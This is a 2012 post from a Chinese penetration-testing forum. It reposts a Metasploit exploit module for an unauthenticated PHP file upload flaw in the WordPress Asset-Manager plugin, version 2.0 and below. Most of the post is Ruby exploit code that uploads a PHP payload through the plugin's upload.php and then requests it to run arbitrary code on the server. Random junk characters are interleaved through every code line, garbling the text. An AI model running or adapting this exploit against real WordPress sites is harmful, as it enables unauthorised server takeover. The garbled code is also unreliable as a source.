找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2522|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
/ W6 w# c5 `3 k
& Y) N% R( D2 j7 V: m##
* j3 t0 N9 i( a* @! `+ N& {! |# U# This file is part of the Metasploit Framework and may be subject to( G& N& G4 H& n& }4 ]
# redistribution and commercial restrictions. Please see the Metasploit3 U% K  Y9 F( V9 V. F1 N
# Framework web site for more information on licensing and terms of use.
1 y# o! |. u$ ~' Q#   http://metasploit.com/framework/8 ]2 H( `. D7 b1 f+ |5 L, r" \7 N
##
8 X2 O5 S+ _+ ?+ h9 _2 H
$ ?* G" A* l( x4 Frequire 'msf/core'- W: b1 }2 Z! ?. z
require 'msf/core/exploit/php_exe'
9 n* G5 d- o  n0 N0 H0 c% _ - D4 x% S' l% R; x; R7 w* A4 i" I
class Metasploit3 < Msf::Exploit::Remote
6 o, P% Q+ A4 a3 U% R5 R  Rank = ExcellentRanking
. O/ M( H( b: F4 [# j# n# l- N ! m1 |4 }  f) `+ O
  include Msf::Exploit::Remote::HttpClient
* t* l( z4 t, T- ~  include Msf::Exploit:hpEXE
$ \" T! m* r+ [7 r+ N  C
; j1 h' z: l& [5 A) i  def initialize(info = {})
4 O" G3 B7 ]3 H4 W; I4 n    super(update_info(info,+ F& v* E( x# e5 e/ E' e2 T! z
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',3 `3 P& K9 n3 u1 |+ r/ A2 N
      'Description'    => %q{1 |3 ]# x4 t! w
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
- K$ O# f2 ?7 x& C6 x4 }        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
7 H8 q+ `1 |3 U: I- E0 z  g3 @3 n        temp directory without authentication, which results in arbitrary code execution.1 R1 d: A" r; j/ D; N+ r& j. [
      },
  x8 S- N9 V3 Z      'Author'         =>, H) T" v) e) S
        [* g: V0 s% P7 q# A+ `5 {5 @
          'Sammy FORGIT', # initial discovery
6 }, X6 Z9 Q7 N- w& U+ x          'James Fitts <fitts.james[at]gmail.com>' # metasploit module$ Y8 \8 W7 q2 H( b+ x# Z
        ],
7 k8 I! K9 I% t      'License'        => MSF_LICENSE,
# F% y$ Y+ Y" Y      'References'     =>$ J  s' L8 S7 Y. R% S
        [
* m" p; L$ b: y- r% ]& m) C          [ 'OSVDB', '82653' ],+ T/ F9 L7 I( R+ y! C8 i* d
          [ 'BID', '53809' ],
  x" m1 l, ^1 K/ f/ @4 p4 M          [ 'EDB', '18993' ],4 U, M2 n# _7 v' o' m. ]& _+ g) c
          [ 'URL', 'http:// www.myhack58.com /' ]6 p$ u7 @  U# k2 D- }) Z3 K: ?
        ],
7 [; @. V7 Z  _  g, t. y: T7 D      'Payload'       =># y0 ~& p7 {& L+ Y; n
        {
  a4 S( k, `2 R1 V4 }: [& d          'BadChars' => "\x00",
; e3 L3 e  I- ?3 Q        },: V: H4 q( u' V" {( q9 ~
      'Platform'       => 'php',
9 V! c- w" t* r6 H8 i% o, F      'Arch'           => ARCH_PHP,
. [% }/ k0 a* D  a6 R5 t  {      'Targets'        =>
; t7 B8 n+ j1 [. x6 z  U        [
8 ^  f, Y* ?9 F, E          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],6 J% R4 H" B# ~4 p1 t! ]7 R
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]+ R$ u) [" v9 u: j1 ~# U, A
        ],
% e3 u7 ?9 r& F- Z* S9 Z6 G      'DefaultTarget' => 0,
9 D* ?- ^0 u- n: h      'DisclosureDate' => 'May 26 2012'))
, x1 J$ A1 F  W% x9 Y5 m" y2 D
* J3 O5 K- x9 c2 w8 s- v% _! s    register_options(: k! X4 i' j1 O& L8 m2 m3 C+ {
      [
+ H1 A% F/ r" u! O- d" [+ ?4 r        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])1 B; {' [) U& W" `* A8 P
      ], self.class)2 x2 C0 i7 g# r" b/ g4 _! f- z
  end
$ x. R7 K3 m# n& z
2 H# r! M0 N3 k2 e' W  def exploit% t6 H1 U4 ?* k8 t5 z" p- D
    uri =  target_uri.path4 p; w; k5 g' {7 ~
    uri << '/' if uri[-1,1] != '/'
8 Y# a. `6 D) v, M6 B6 o( |    peer = "#{rhost}:#{rport}"# u) y4 K3 i  H" l' F
    payload_name = "#{rand_text_alpha(5)}.php"( m9 ~2 e- L0 R+ i
    php_payload = get_write_exec_payload(:unlink_self=>true); B$ O6 F8 e6 ^* F7 ~/ ?# ~
% x, g1 m- D8 U! Y
    data = Rex::MIME::Message.new3 a* N0 E7 C: S3 W
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
5 v" A: Z3 O( S9 x/ q7 s    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
) n1 T: w1 K# A2 S) F- h/ A4 l. e. P ) ~4 {) h+ k% p0 ?6 z& i) M) v
    print_status("#{peer} - Uploading payload #{payload_name}")
/ w2 @( F" M5 [! z& [    res = send_request_cgi({. n% ], i2 U8 A2 [# v
      'method'  => 'POST',) d& J; s- G. e
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",' j/ l6 {: s" c: V% U
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
8 f9 h# A8 K" \6 f; k      'data'    => post_data
" F, d- n3 c, g7 E/ d6 T2 @    })8 X" E) r+ S$ a$ `
; k: o0 M3 v/ g+ d  U% g
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
8 @6 Y5 o# X" w3 p5 T      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
  i6 a( k! T3 B: bend% t/ X; \3 ^0 c$ t# ~. k' e
3 m3 d- k: |; t
    print_status("#{peer} - Executing payload #{payload_name}")
* k! U; F- E- v8 i    res = send_request_raw({
' i1 p, {, h6 N; V8 R      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
1 i9 ?/ o. g, S1 Y% z6 I, j      'method'  => 'GET'
0 V; W7 {9 Z+ Y6 p! y1 r7 z. v: p    })
# b; V# M  n8 L2 b/ S& [8 ^
: ~! X3 I" _5 a: e% ?" W, g2 L    if res and res.code != 200- W. i  u* `) u" b2 E. [" @0 z4 S9 U
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")8 V1 U% V5 t2 b
    end& G( n9 f) M3 M. ?! T8 X
  end, M' [" B+ P) A+ R
end3 K+ r7 i) ]8 v+ E4 M* N
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表